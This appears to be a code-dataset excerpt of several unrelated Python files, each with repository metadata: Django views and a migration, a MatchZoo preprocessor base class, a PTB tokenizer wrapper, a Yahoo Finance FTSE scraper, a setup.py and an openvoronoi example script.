sidrakesh93/grpc-tools | benchmarking/performance_db/performance_db_frontend/app/views.py | 1 | 3289 | #
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
"""View for the front-end."""
from django import shortcuts
from user_data import UserData
user_data = UserData()
def display_performance_database(request):
"""View for performance database table page."""
data = user_data.get_all_users_data()
return shortcuts.render(request, 'data_table.html', {'all_users_data': data})
def display_configs(request):
"""View for config page."""
return shortcuts.render(request, 'configs.html', {})
def display_general_statistic(request, metric):
"""View for general statistic page."""
return general_statistic_renderer(request, metric)
def general_statistic_renderer(request, metric):
"""General statistic page renderer."""
data = user_data.get_all_users_single_metric_data(metric)
return shortcuts.render(
request, 'general_plots.html',
{'metric': get_metric_full_desc(metric),
'all_users_data': data})
def display_user_metrics(request, username):
"""View for user metrics page."""
complete_data = user_data.get_single_user_data(username)
return shortcuts.render(
request, 'user_plots.html',
{'username': complete_data[0],
'user_data': complete_data[1]})
def get_metric_full_desc(metric):
"""Returns full metric name."""
metric_name = {
'qps': 'Queries Per Second',
'qpspercore': 'QPS Per Core',
'perc50': '50th Percentile Latency',
'perc90': '90th Percentile Latency',
'perc95': '95th Percentile Latency',
'perc99': '99th Percentile Latency',
'perc99point9': '99.9th Percentile Latency',
'serversystime': 'Server System Time',
'serverusertime': 'Server User Time',
'clientsystime': 'Client System Time',
'clientusertime': 'Client User Time'
}[metric]
return metric_name
| bsd-3-clause | 2,365,342,280,328,738,000 | 35.544444 | 79 | 0.725753 | false | 4.025704 | false | false | false |
faneshion/MatchZoo | matchzoo/engine/base_preprocessor.py | 1 | 4116 | """:class:`BasePreprocessor` define input and ouutput for processors."""
import abc
import functools
import typing
from pathlib import Path
import dill
import matchzoo as mz
def validate_context(func):
"""Validate context in the preprocessor."""
@functools.wraps(func)
def transform_wrapper(self, *args, **kwargs):
if not self.context:
raise ValueError('Please call `fit` before calling `transform`.')
return func(self, *args, **kwargs)
return transform_wrapper
class BasePreprocessor(metaclass=abc.ABCMeta):
"""
:class:`BasePreprocessor` to input handle data.
A preprocessor should be used in two steps. First, `fit`, then,
`transform`. `fit` collects information into `context`, which includes
everything the preprocessor needs to `transform` together with other
useful information for later use. `fit` will only change the
preprocessor's inner state but not the input data. In contrast,
`transform` returns a modified copy of the input data without changing
the preprocessor's inner state.
"""
DATA_FILENAME = 'preprocessor.dill'
def __init__(self):
"""Initialization."""
self._context = {}
@property
def context(self):
"""Return context."""
return self._context
@abc.abstractmethod
def fit(
self,
data_pack: 'mz.DataPack',
verbose: int = 1
) -> 'BasePreprocessor':
"""
Fit parameters on input data.
This method is an abstract base method, need to be
implemented in the child class.
This method is expected to return itself as a callable
object.
:param data_pack: :class:`Datapack` object to be fitted.
:param verbose: Verbosity.
"""
@abc.abstractmethod
def transform(
self,
data_pack: 'mz.DataPack',
verbose: int = 1
) -> 'mz.DataPack':
"""
Transform input data to expected manner.
This method is an abstract base method, need to be
implemented in the child class.
:param data_pack: :class:`DataPack` object to be transformed.
:param verbose: Verbosity.
or list of text-left, text-right tuples.
"""
def fit_transform(
self,
data_pack: 'mz.DataPack',
verbose: int = 1
) -> 'mz.DataPack':
"""
Call fit-transform.
:param data_pack: :class:`DataPack` object to be processed.
:param verbose: Verbosity.
"""
return self.fit(data_pack, verbose=verbose) \
.transform(data_pack, verbose=verbose)
def save(self, dirpath: typing.Union[str, Path]):
"""
Save the :class:`DSSMPreprocessor` object.
A saved :class:`DSSMPreprocessor` is represented as a directory with
the `context` object (fitted parameters on training data), it will
be saved by `pickle`.
:param dirpath: directory path of the saved :class:`DSSMPreprocessor`.
"""
dirpath = Path(dirpath)
data_file_path = dirpath.joinpath(self.DATA_FILENAME)
if data_file_path.exists():
raise FileExistsError(
f'{data_file_path} instance exist, fail to save.')
elif not dirpath.exists():
dirpath.mkdir()
dill.dump(self, open(data_file_path, mode='wb'))
@classmethod
def _default_units(cls) -> list:
"""Prepare needed process units."""
return [
mz.preprocessors.units.tokenize.Tokenize(),
mz.preprocessors.units.lowercase.Lowercase(),
mz.preprocessors.units.punc_removal.PuncRemoval(),
]
def load_preprocessor(dirpath: typing.Union[str, Path]) -> 'mz.DataPack':
"""
Load the fitted `context`. The reverse function of :meth:`save`.
:param dirpath: directory path of the saved model.
:return: a :class:`DSSMPreprocessor` instance.
"""
dirpath = Path(dirpath)
data_file_path = dirpath.joinpath(BasePreprocessor.DATA_FILENAME)
return dill.load(open(data_file_path, 'rb'))
| apache-2.0 | -928,447,038,971,826,800 | 28.191489 | 78 | 0.622449 | false | 4.20429 | false | false | false |
hugdiniz/anuarioDjango | yearbook/migrations/0005_auto_20141214_0017.py | 1 | 1444 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('yearbook', '0004_auto_20141212_1558'),
]
operations = [
migrations.RemoveField(
model_name='lotacao',
name='comentarios',
),
migrations.AddField(
model_name='pessoa',
name='historico',
field=models.ManyToManyField(related_name=b'lotacoes_anteriores', to='yearbook.Lotacao', blank=True),
preserve_default=True,
),
migrations.AddField(
model_name='unidade_organizacional',
name='localidade_sala',
field=models.ForeignKey(blank=True, to='yearbook.Sala', null=True),
preserve_default=True,
),
migrations.AlterField(
model_name='lotacao',
name='funcao',
field=models.ForeignKey(blank=True, to='yearbook.Funcao', null=True),
),
migrations.AlterField(
model_name='pessoa',
name='ferias_fim',
field=models.DateTimeField(null=True, verbose_name=b'fim das ferias', blank=True),
),
migrations.AlterField(
model_name='pessoa',
name='ferias_inicio',
field=models.DateTimeField(null=True, verbose_name=b'inicio das ferias', blank=True),
),
]
| gpl-2.0 | -4,371,260,729,932,835,000 | 31.088889 | 113 | 0.572022 | false | 3.871314 | false | false | false |
MeteorKepler/RICGA | ricga/eval_tools/pycocoevalcap/tokenizer/ptbtokenizer.py | 1 | 2833 | #!/usr/bin/env python
#
# File Name : ptbtokenizer.py
#
# Description : Do the PTB Tokenization and remove punctuations.
#
# Creation Date : 29-12-2014
# Last Modified : Thu Mar 19 09:53:35 2015
# Authors : Hao Fang <[email protected]> and Tsung-Yi Lin <[email protected]>
import os
import subprocess
import tempfile
# path to the stanford corenlp jar
STANFORD_CORENLP_3_4_1_JAR = 'stanford-corenlp-3.4.1.jar'
# punctuations to be removed from the sentences
PUNCTUATIONS = ["''", "'", "``", "`", "-LRB-", "-RRB-", "-LCB-", "-RCB-", \
".", "?", "!", ",", ":", "-", "--", "...", ";"]
class PTBTokenizer:
"""Python wrapper of Stanford PTBTokenizer"""
def tokenize(self, captions_for_image):
cmd = ['java', '-cp', STANFORD_CORENLP_3_4_1_JAR, \
'edu.stanford.nlp.process.PTBTokenizer', \
'-preserveLines', '-lowerCase']
# ======================================================
# prepare data for PTB Tokenizer
# ======================================================
final_tokenized_captions_for_image = {}
image_id = [k for k, v in captions_for_image.items() for _ in range(len(v))]
sentences = '\n'.join([c['caption'].replace('\n', ' ') for k, v in captions_for_image.items() for c in v])
# ======================================================
# save sentences to temporary file
# ======================================================
path_to_jar_dirname = os.path.dirname(os.path.abspath(__file__))
tmp_file = tempfile.NamedTemporaryFile(delete=False, dir=path_to_jar_dirname)
tmp_file.write(sentences)
tmp_file.close()
# ======================================================
# tokenize sentence
# ======================================================
cmd.append(os.path.basename(tmp_file.name))
p_tokenizer = subprocess.Popen(cmd, cwd=path_to_jar_dirname, \
stdout=subprocess.PIPE)
token_lines = p_tokenizer.communicate(input=sentences.rstrip())[0]
lines = token_lines.split('\n')
# remove temp file
os.remove(tmp_file.name)
# ======================================================
# create dictionary for tokenized captions
# ======================================================
for k, line in zip(image_id, lines):
if not k in final_tokenized_captions_for_image:
final_tokenized_captions_for_image[k] = []
tokenized_caption = ' '.join([w for w in line.rstrip().split(' ') \
if w not in PUNCTUATIONS])
final_tokenized_captions_for_image[k].append(tokenized_caption)
return final_tokenized_captions_for_image
| apache-2.0 | 4,010,289,009,320,253,400 | 41.283582 | 114 | 0.484998 | false | 3.907586 | false | false | false |
guoxiaoyong/simple-useful | cxx_learn/cronx/spider/spider_daily_ftse100.py | 2 | 2199 | #!/usr/bin/python
# -*- coding: utf-8 -*-
import urllib2;
import re;
import string;
import sys;
from BeautifulSoup import BeautifulSoup
month_num = {
'Jan' : '01',
'Feb' : '02',
'Mar' : '03',
'Apr' : '04',
'May' : '05',
'Jun' : '06',
'Jul' : '07',
'Aug' : '08',
'Sep' : '09',
'Oct' : '10',
'Nov' : '11',
'Dec' : '12'
''
};
def process_date(raw_date):
global month_num;
raw_list=raw_date.split(' ');
month_str=month_num[raw_list[0]];
day_list=raw_list[1].split(',');
if len(day_list[0]) == 1:
day_str = '0' + day_list[0];
else:
day_str = day_list[0];
year_str = raw_list[2];
return year_str + '-' + month_str + '-' + day_str;
def process_num(raw_num):
raw_list=raw_num.split(',');
sz = len(raw_list);
str_num=raw_list[0];
for i in range(1,sz):
str_num = str_num+raw_list[i];
return str_num;
str_url = "http://finance.yahoo.com/q/hp?s=%5EFTSE+Historical+Prices";
req=urllib2.Request(str_url);
resp=urllib2.urlopen(req);
respHtml=resp.read();
HtmlEncoding = "UTF-8";
soup = BeautifulSoup(respHtml, fromEncoding=HtmlEncoding);
tag_top = soup.find('table', {"class":"yfnc_datamodoutline1"});
tag_body = tag_top.contents[0].contents[0].contents[0];
str_date = process_date(tag_body.contents[1].contents[0].contents[0]);
open_price = process_num(tag_body.contents[1].contents[1].contents[0]);
high_price = process_num(tag_body.contents[1].contents[2].contents[0]);
low_price = process_num(tag_body.contents[1].contents[3].contents[0]);
close_price = process_num(tag_body.contents[1].contents[4].contents[0]);
volume = process_num(tag_body.contents[1].contents[5].contents[0]);
if volume != "0":
daily_file = sys.argv[1];
history_file = sys.argv[2];
daily_fp = open(daily_file, 'w');
history_fp = open(history_file, 'a');
title_str = "Date,Open Price,High Price,Low Price,Close Price,Volume(GBP)\n";
daily_fp.write(title_str);
day_market_data = str_date+","+open_price+","+high_price+","+low_price+","+close_price+","+volume+'\n';
daily_fp.write(day_market_data);
history_fp.write(day_market_data);
daily_fp.close();
history_fp.close();
| cc0-1.0 | -2,231,879,005,828,900,900 | 29.123288 | 108 | 0.612551 | false | 2.704797 | false | false | false |
YAmikep/django-xmlmapping | setup.py | 1 | 3687 | """
Based entirely on Django's own ``setup.py`` for now.
"""
from distutils.core import setup
from distutils.command.install_data import install_data
from distutils.command.install import INSTALL_SCHEMES
import os
import sys
class osx_install_data(install_data):
# On MacOS, the platform-specific lib dir is /System/Library/Framework/Python/.../
# which is wrong. Python 2.5 supplied with MacOS 10.5 has an Apple-specific fix
# for this in distutils.command.install_data#306. It fixes install_lib but not
# install_data, which is why we roll our own install_data class.
def finalize_options(self):
# By the time finalize_options is called, install.install_lib is set to the
# fixed directory, so we set the installdir to install_lib. The
# install_data class uses ('install_data', 'install_dir') instead.
self.set_undefined_options('install', ('install_lib', 'install_dir'))
install_data.finalize_options(self)
if sys.platform == "darwin":
cmdclasses = {'install_data': osx_install_data}
else:
cmdclasses = {'install_data': install_data}
def fullsplit(path, result=None):
"""
Split a pathname into components (the opposite of os.path.join) in a
platform-neutral way.
"""
if result is None:
result = []
head, tail = os.path.split(path)
if head == '':
return [tail] + result
if head == path:
return result
return fullsplit(head, [tail] + result)
# Tell distutils not to put the data_files in platform-specific installation
# locations. See here for an explanation:
# http://groups.google.com/group/comp.lang.python/browse_thread/thread/35ec7b2fed36eaec/2105ee4d9e8042cb
for scheme in INSTALL_SCHEMES.values():
scheme['data'] = scheme['purelib']
# Compile the list of packages available, because distutils doesn't have
# an easy way to do this.
packages, data_files = [], []
root_dir = os.path.dirname(__file__)
if root_dir != '':
os.chdir(root_dir)
xmlmapping_dir = 'xmlmapping'
for dirpath, dirnames, filenames in os.walk(xmlmapping_dir):
# Ignore dirnames that start with '.'
for i, dirname in enumerate(dirnames):
if dirname.startswith('.'):
del dirnames[i]
if '__init__.py' in filenames:
packages.append('.'.join(fullsplit(dirpath)))
elif filenames:
data_files.append([dirpath, [os.path.join(dirpath, f) for f in filenames]])
# Small hack for working with bdist_wininst.
# See http://mail.python.org/pipermail/distutils-sig/2004-August/004134.html
if len(sys.argv) > 1 and sys.argv[1] == 'bdist_wininst':
for file_info in data_files:
file_info[0] = '\\PURELIB\\%s' % file_info[0]
# Dynamically calculate the version based on django.VERSION.
version = __import__('xmlmapping').get_version()
setup(
name = "django-xmlmapping",
version = version,
url = 'https://github.com/YAmikep/django-xmlmapping',
author = 'Michael Palumbo',
author_email = '[email protected]',
description = 'Library to map XML data to a Django data model and persist the data in the data base.',
packages = packages,
cmdclass = cmdclasses,
data_files = data_files,
classifiers = [
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Utilities',
'Topic :: Internet'
],
)
| bsd-3-clause | 3,709,194,845,001,403,000 | 35.622449 | 106 | 0.652834 | false | 3.694389 | false | false | false |
aewallin/openvoronoi | python_examples/line-segment/lineseg_3.py | 1 | 4439 | import openvoronoi as ovd
import ovdvtk
import time
import vtk
import datetime
import math
import random
import os
def drawLine(myscreen, p1, p2):
myscreen.addActor(ovdvtk.Line(p1=(p1.x, p1.y, 0), p2=(p2.x, p2.y, 0), color=ovdvtk.yellow))
def writeFrame(w2if, lwr, n):
w2if.Modified()
current_dir = os.getcwd()
filename = current_dir + "/frames/vd500_zoomout" + ('%05d' % n) + ".png"
lwr.SetFileName(filename)
# lwr.Write()
def regularGridGenerators(far, Nmax):
# REGULAR GRID
rows = int(math.sqrt(Nmax))
print "rows= ", rows
gpos = [-0.7 * far, 1.4 * far / float(rows - 1)] # start, stride
plist = []
for n in range(rows):
for m in range(rows):
x = gpos[0] + gpos[1] * n
y = gpos[0] + gpos[1] * m
# rotation
# alfa = 0
# xt=x
# yt=y
# x = xt*math.cos(alfa)-yt*math.sin(alfa)
# y = xt*math.sin(alfa)+yt*math.cos(alfa)
plist.append(ovd.Point(x, y))
random.shuffle(plist)
return plist
def randomGenerators(far, Nmax):
pradius = (1.0 / math.sqrt(2)) * far
plist = []
for n in range(Nmax):
x = -pradius + 2 * pradius * random.random()
y = -pradius + 2 * pradius * random.random()
plist.append(ovd.Point(x, y))
return plist
def circleGenerators(far, Nmax):
# POINTS ON A CIRCLE
# """
# cpos=[50,50]
# npts = 100
dalfa = float(2 * math.pi) / float(Nmax - 1)
# dgamma= 10*2*math.pi/npts
# alfa=0
# ofs=10
plist = []
radius = 0.81234 * float(far)
for n in range(Nmax):
x = float(radius) * math.cos(float(n) * float(dalfa))
y = float(radius) * math.sin(float(n) * float(dalfa))
plist.append(ovd.Point(x, y))
# random.shuffle(plist)
return plist
if __name__ == "__main__":
# print ocl.revision()
myscreen = ovdvtk.VTKScreen(width=1024, height=720) # (width=1920, height=1080)
ovdvtk.drawOCLtext(myscreen, rev_text=ovd.version())
w2if = vtk.vtkWindowToImageFilter()
w2if.SetInput(myscreen.renWin)
lwr = vtk.vtkPNGWriter()
lwr.SetInputConnection(w2if.GetOutputPort())
# w2if.Modified()
# lwr.SetFileName("tux1.png")
scale = 1
myscreen.render()
random.seed(42)
far = 1
camPos = far
zmult = 4
# camPos/float(1000)
myscreen.camera.SetPosition(0, -camPos / float(1000), zmult * camPos)
myscreen.camera.SetClippingRange(-(zmult + 1) * camPos, (zmult + 1) * camPos)
myscreen.camera.SetFocalPoint(0.0, 0, 0)
vd = ovd.VoronoiDiagram(far, 120)
print ovd.version()
# for vtk visualization
vod = ovdvtk.VD(myscreen, vd, float(scale), textscale=0.01, vertexradius=0.003)
vod.drawFarCircle()
# vod.clearance_disk=1
vod.vertexRadius = 0.005
vod.textScale = 0.02
Nmax = 20
plist = randomGenerators(far, Nmax)
# plist = regularGridGenerators(far, Nmax)
# plist = circleGenerators(far, Nmax)
# plist = randomGenerators(far, Nmax)
# plist = []
# plist.append( ovd.Point(0.0,0.1) )
# plist.append( ovd.Point(0,0.9) )
# plist.append( ovd.Point(-0.15, -0.15) )
# + regularGridGenerators(far, Nmax) + circleGenerators(far, Nmax)
# plist = [ovd.Point(0,0)]
t_before = time.time()
n = 0
id_list = []
for p in plist:
print n, " adding ", p
id_list.append(vd.addVertexSite(p))
n = n + 1
Nsegs = 0
# print "returned: ",vd.addLineSite(69,105,10)
"""
vd.addLineSite(83,35)
vd.addLineSite(63,153)
vd.addLineSite(48,20)
vd.addLineSite(74,143)
vd.addLineSite(125,173)
vd.addLineSite(165,91)
"""
# segs=[]
# for n in range(Nsegs*2):
# ids.append( id_list[n] )
# segs.append( [17,13] )
# segs.append( [21,34] )
# segs.append( [26,44] )
# id1 = id_list[0]
# id2 = id_list[1]
# id3 = id_list[2]
# id4 = id_list[3]
# for seg in segs:
# id1= seg[0]
# id2= seg[1]
# print "add segment ",id1, " to ", id2
# vd.addLineSite( id1, id2 , 20)
# vd.addLineSite( id3, id4 )
t_after = time.time()
calctime = t_after - t_before
if Nmax == 0:
Nmax = 1
print " VD done in ", calctime, " s, ", calctime / Nmax, " s per generator"
vod.setAll()
myscreen.render()
print "PYTHON All DONE."
myscreen.render()
myscreen.iren.Start()
| lgpl-2.1 | 1,067,751,821,632,725,200 | 24.80814 | 95 | 0.573327 | false | 2.741816 | false | false | false |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.